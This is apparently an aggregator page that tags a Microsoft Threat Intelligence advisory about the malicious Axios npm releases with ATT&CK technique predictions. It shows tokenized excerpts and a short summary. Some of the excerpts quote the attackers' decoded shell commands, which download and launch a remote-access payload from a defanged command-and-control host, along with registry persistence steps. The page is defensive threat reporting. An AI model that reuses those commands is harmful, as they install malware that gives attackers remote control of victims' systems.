TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Microsoft Threat Intelligence

Mitigating the Axios npm supply chain compromise

Microsoft Threat Intelligence and Microsoft Defender Security Research Team · 2026-04-01 · Read original ↗

ATT&CK techniques detected

29 predictions
T1071.001Web Protocols
99%
"information model ( asim ) functions to hunt threats across both microsoft first - party and third - party data sources. asim also supports deploying parsers to specific workspaces from github, using an arm template or manually. detect network ip and domain indicators of compromi…"
T1195.001Compromise Software Dependencies and Development Tools
98%
"fraudulent meeting links that impersonate legitimate video conferencing applications, such as zoom. sapphire sleet overlaps with activity tracked by other security vendors as unc1069, stardust chollima, alluring pisces, bluenoroff, cageychameleon, or cryptocore. mitigation and pr…"
T1059.001PowerShell
98%
". act. mond & & / bin / zsh - c " / library / caches / com. apple. act. mond hxxp : / / sfrclak [. ] com : 8000 / 6202033 & " & > / dev / null ' windows on windows, the rat is identified as a powershell : 6202033. ps1. sha - 256 : ed8560c1ac7ceb6983ba995124d5917dc1a00288912387a63…"
T1195.001Compromise Software Dependencies and Development Tools
98%
"credentials immediately and downgrade to a safe version ( 1. 14. 0 or 0. 30. 3 ). users should also follow the mitigation and protection guidance provided in this blog, including disabling auto - updates for axios npm packages, since the malicious payload includes a hook that wil…"
T1204.002Malicious File
97%
"] com : 8000 / 6202033 ), and the os selection is conveyed through post bodies packages. npm. org / product0 | product1 | product2. this enables the operator to serve platform - specific payloads from one route while keeping the client - side logic minimal. on windows, the malici…"
T1071.001Web Protocols
97%
"##ize imnws _ mintime = min ( timegenerated ), imnws _ maxtime = max ( timegenerated ), eventcount = count ( ) by srcipaddr, dstipaddr, dstdomain, dvc, eventproduct, eventvendor detect web sessions ip and domain indicators of compromise using asim the following query checks ip ad…"
T1059.001PowerShell
97%
"##hell rat creates % programdata % \ system. bat and adds a registry run key at hkcu : \ software \ microsoft \ windows \ currentversion \ run \ microsoftupdate to enable re - fetching of rat after every reboot. this added registry run key can persist after reboot. sha - 256 : f7…"
T1195.001Compromise Software Dependencies and Development Tools
96%
"mitigating the axios npm supply chain compromise on march 31, 2026, two new npm packages for updated versions of axios, a popular http client for javascript that simplifies making http requests to a rest endpoint with over 70 million weekly downloads, were identified as malicious…"
T1195.001Compromise Software Dependencies and Development Tools
96%
"cache clean – force “. disable or restrict automated dependency bots for critical packages. adopt trusted publishing with oidc to eliminate stored credentials. review your ci / cd pipeline logs for any npm install executions that might have updated to axios @ 1. 14. 1 or axios @ …"
T1059.001PowerShell
96%
", leaving behind a clean - looking manifest to reduce the chance that post - incident inspection of node _ modules reveals the original install hook. rat deployment as covert remote management the windows rat is a powershell script that functions as a covert remote management com…"
T1195.001Compromise Software Dependencies and Development Tools
91%
"##sable automated dependency bots ( such as dependabot or renovate ) by disabling or restricting axios updates in their config to prevent pr ‑ based auto ‑ updates, which are often mistaken for npm behavior : # dependabot example ignore : - dependency - name : " axios " check for…"
T1195.001Compromise Software Dependencies and Development Tools
89%
"a follow ‑ up release adds the malicious install - time logic ( plain - crypto - js @ 4. 2. 1 ), introducing an install hook that runs node setup. js and includes a clean manifest stub ( package. md ) intended for later replacement. two axios releases are then published with a su…"
T1059.004Unix Shell
89%
"a binary to / library / caches / com. apple. act. mond, applies chmod 770, then starts it using / bin / zsh in the background. node setup. js sh - c ' curl - o / library / caches / com. apple. act. mond the applescript is removed afterward ; the durable artifact is typically libr…"
T1587Develop Capabilities
86%
"credentials immediately and downgrade to a safe version ( 1. 14. 0 or 0. 30. 3 ). users should also follow the mitigation and protection guidance provided in this blog, including disabling auto - updates for axios npm packages, since the malicious payload includes a hook that wil…"
T1059.006Python
83%
"" & del " c : \ users \ \ appdata \ local \ temp \ 6202033. ps1 " / f linux / others on linux, the rat is identified as a python payload : ld. py. sha - 256 : fcb81618bb15edfdedfb638b4c08a2af9cac9ecfa551af135a8402bf980375cf a python payload is written to / tmp / ld. py and launch…"
T1587Develop Capabilities
83%
"mitigating the axios npm supply chain compromise on march 31, 2026, two new npm packages for updated versions of axios, a popular http client for javascript that simplifies making http requests to a rest endpoint with over 70 million weekly downloads, were identified as malicious…"
T1195.001Compromise Software Dependencies and Development Tools
69%
"assessment. in addition, security copilot offers developer scenarios that allow customers to build, test, publish, and integrate ai agents and plugins to meet unique security needs. learn more for the latest security research from the microsoft threat intelligence community, chec…"
T1195.001Compromise Software Dependencies and Development Tools
67%
"- stage malware. windows, macos, and linux systems are all targeted with platform - specific payloads. microsoft threat intelligence has determined the account that created the plain - crypto - js package is associated with sapphire sleet infrastructure. that account has been dis…"
T1195.002Compromise Software Supply Chain
59%
"- stage malware. windows, macos, and linux systems are all targeted with platform - specific payloads. microsoft threat intelligence has determined the account that created the plain - crypto - js package is associated with sapphire sleet infrastructure. that account has been dis…"
T1587Develop Capabilities
53%
"fraudulent meeting links that impersonate legitimate video conferencing applications, such as zoom. sapphire sleet overlaps with activity tracked by other security vendors as unc1069, stardust chollima, alluring pisces, bluenoroff, cageychameleon, or cryptocore. mitigation and pr…"
T1195.001Compromise Software Dependencies and Development Tools
52%
"set ignore - scripts true ”. remove all axios files / code from the victim systems and re - install cleanly. defending against the axios supply chain attack microsoft threat intelligence recommends the following mitigation measures to protect organizations against this threat. fu…"
T1059.004Unix Shell
50%
"using nohup python3 / tmp / ld. py hxxp : / / sfrclak [. ] com : 8000 / 6202033 … &. / tmp / ld. py remains a key on - disk indicator in typical flows. observed linux / unix command ( as decoded ) : / bin / sh - c " curl - o / tmp / ld. py - d packages. npm. org / product2 - s hx…"
T1587Develop Capabilities
49%
"##sable automated dependency bots ( such as dependabot or renovate ) by disabling or restricting axios updates in their config to prevent pr ‑ based auto ‑ updates, which are often mistaken for npm behavior : # dependabot example ignore : - dependency - name : " axios " check for…"
T1204.002Malicious File
48%
"query patterns are available here as well as in the hunting queries section. microsoft defender detections microsoft defender customers can refer to the list of applicable detections below. durable detections that were already in place alerted and protected customers from this at…"
T1547.001Registry Run Keys / Startup Folder
42%
". act. mond & & / bin / zsh - c " / library / caches / com. apple. act. mond hxxp : / / sfrclak [. ] com : 8000 / 6202033 & " & > / dev / null ' windows on windows, the rat is identified as a powershell : 6202033. ps1. sha - 256 : ed8560c1ac7ceb6983ba995124d5917dc1a00288912387a63…"
T1036.003Rename Legitimate Utilities
38%
"##hell rat creates % programdata % \ system. bat and adds a registry run key at hkcu : \ software \ microsoft \ windows \ currentversion \ run \ microsoftupdate to enable re - fetching of rat after every reboot. this added registry run key can persist after reboot. sha - 256 : f7…"
T1657Financial Theft
36%
"##64 ‑ encoded payloads, enabling flexible control of the compromised system while minimizing on ‑ disk artifacts. who is sapphire sleet? sapphire sleet is a north korean state actor that has been active since at least march 2020. the threat actor focuses primarily on the finance…"
T1105Ingress Tool Transfer
34%
"the affected versions ). the package manager resolves and installs the injected dependency ( plain - crypto - js @ 4. 2. 1 ). during installation, the dependency ’ s lifecycle script automatically launches node setup. js ( no additional user step required ), which decodes embedde…"
T1547.001Registry Run Keys / Startup Folder
31%
"##hell rat creates % programdata % \ system. bat and adds a registry run key at hkcu : \ software \ microsoft \ windows \ currentversion \ run \ microsoftupdate to enable re - fetching of rat after every reboot. this added registry run key can persist after reboot. sha - 256 : f7…"

Summary

On March 31, 2026, the popular HTTP client Axios experienced a supply chain attack, causing two newly published npm packages for version updates to download from command and control (C2) that Microsoft Threat Intelligence has attributed to the North Korean state actor Sapphire Sleet. Although the malicious versions are no longer available for download, since Axios is one of the most widely used HTTP clients in the JavaScript ecosystem, this compromise exposed hundreds to potentially millions of users.

The post Mitigating the Axios npm supply chain compromise appeared first on Microsoft Security Blog.